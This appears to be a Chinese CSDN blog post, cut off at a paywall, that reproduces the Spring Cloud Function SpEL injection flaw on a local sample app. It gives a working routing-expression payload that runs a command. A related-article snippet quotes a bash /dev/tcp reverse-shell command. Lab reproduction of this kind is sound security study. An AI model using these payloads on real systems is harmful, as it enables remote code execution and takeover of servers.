SpringCloudFunction漏洞分析以及复现

已于 2022-04-06 13:17:23 修改
阅读量2.2k 收藏 2
点赞数
文章标签: 网络安全 spring
于 2022-03-29 15:06:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35976649/article/details/123819016
版权
本文档详细介绍了SpringCloudFunction的漏洞复现过程,包括源码下载与环境配置,通过默认配置复现问题,以及分析修复补丁。在默认配置下,通过POST请求functionRouter路由可执行任意命令,而在补丁中,发现了由于expression.getValue()的执行导致的安全隐患。
摘要由CSDN通过智能技术生成

文章目录

复现

0.源码下载和环境配置

在github上down下存在漏洞的源码:https://github.com/spring-cloud/spring-cloud-function/releases/tag/v3.2.0
在spring-cloud-function-3.2.0\spring-cloud-function-3.2.0\spring-cloud-function-samples目录下使用idea直接打开function-sample
在这里插入图片描述

1.使用默认配置下functionRouter路由复现

直接运行src/main/java/com/example/SampleApplication.java
在这里插入图片描述
默认端口为8080,可在src/main/resources/application.properties中添加server.port = 8888
进行端口修改。
默认页面为:
在这里插入图片描述

burp对存在漏洞的路由functionRouter进行post发包可执行任意命令。
payload为spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
在这里插入图片描述

2.修改默认设置使任意路由可触发:

在src/main/resources/application.properties中添加spring.cloud.function.definition:functionRouter造成任意路

最低0.47元/天 解锁文章
error_404_1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SpringCloud Function实践入门
zhulier1124的博客
08-29 1万+
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,项目主要负责人为Mark Fisher,目前已经来到了3.0版本。SpringCloud Function的出现旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同...
SpringCloud笔记总结3
qq_45498432的博客
03-24 592
http客户端Feign
【墨菲安全实验室】Spring Cloud Function 3.0.0.RELEASE~3.2.2版本SPEL 表达式注入
murphysec的博客
03-26 1980
实验室昨天第一时间监测到的0day漏洞,目前已上线检测 3月25日,墨菲安全实验室监测发现 Spring Cloud Function 修复了 Spel 表达式注入漏洞,已 2022.03.25 日17时提交CNVD,并上线检测能力。 漏洞发现时间:2022-03-24 漏洞验证时间:2022-03-25,已第一时间提交CNVD 标题:Spring Cloud Function 3.0.0.RELEASE~3.2.2 版本SPEL表达式注入漏洞 发现方式:墨菲安全实验室情报预警监控 语言:ja.
SpringCloud 集成 RocketMQ 示例及配置详解
最新发布
demo_yo的博客
05-13 1614
定义Spring Cloud Stream 是一个用来为微服务应用构建消息驱动能力的框架。它可以基于 Spring Boot 来创建独立的、可用于生产的 Spring 应用程序。Spring Cloud Stream 为一些供应商的消息中间件产品提供了个性化的自动化配置实现,并引入了发布-订阅、消费组、分区这三个核心概念。简单的说,Spring Cloud Stream本质上就是整合了Spring Boot和Spring Integration,实现了一套轻量级的消息驱动的微服务框架。抽象模型。
SpringBoot2
luobailian的专栏
07-19 1340
第一季:SpringBoot2核心技术-基础入门 学习要求 熟悉Spring基础 熟悉Maven使用 环境要求 3、时代背景 3.1、微服务 James Lewis and Martin Fowler (2014) 提出微服务完整概念。https://martinfowler.com/microservices/ In short, the microservice architectural style is an approach to developing a single ap
SpringCloud项目报错和解决方法记录
不管多大的困难都要跨过去
03-03 1001
记录SpringCloud项目开发中的报错和解决过程
漏洞复现是什么.txt
01-31
漏洞复现
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
hello-fun:示例Spring Cloud Function应用程序
02-18
你好乐趣模板仓库 该模板存储库提供了一个基于Spring Boot和Spring Cloud Function的简单Hello Web应用程序。 它可以部署为独立的Web应用程序,Kubernetes部署和服务或Knative服务。 代码 注意:为Java 11配置了项目,如果使用的是Java 8,则修改pom.xml的java.version属性。 该项目包含以下内容: . ├── README.md ├── mvnw ├── mvnw.cmd ├── pom.xml └── src ├── main │   ├── java │   │   └── com │   │   └── example │   │   └── helloapp │   │   └── HelloAppAppl
原项目引入springcloud报错:org.springframework.boot.context.properties.ConfigurationBeanFactoryMetadata
qun7559的博客
03-15 4900
原来springboot项目引入分布式springcloud报错处理,org.springframework.boot.context.properties.ConfigurationBeanFactoryMetadata
Spring Cloud Function SPEL表达式注入漏洞复现
xhwfa的博客
04-20 3546
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
高风险组件漏洞及修复办法「持续补充更新」
背锅神童的博客
09-18 3268
漏洞漏洞修复、系统漏洞、权限提升漏洞、本地权限提升、注入漏洞、反序列化漏洞、身份认证绕过漏洞、远程代码执行漏洞、系列漏洞
SpringCloud之Config配置中心
热门推荐
桐花思雨
11-07 1万+
目录`config` 简介`config` 作用`config` 架构 config 简介 springcloud config 项目是一个解决分布式系统的配置管理方案。它包含了 client 和 server 两个部分,server 端提供配置文件的存储、以接口的形式将配置文件的内容提供出去,client 端通过接口获取数据、并依据此数据初始化自己的应用 目前 springcloud config 的使用主要是通过 git/svn 方式做一个配置中心,然后每个服务从其中获取自身配置所需的参数 spring
spring还有这种编码?A default binder has been requested, but there is no binder available
chingee的博客
04-24 2282
A default binder has been requested, but there is no binder available
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3779
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2161
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
SpringBoot SpEL表达式注入漏洞-分析复现
06-02
下面我将对该漏洞进行分析复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值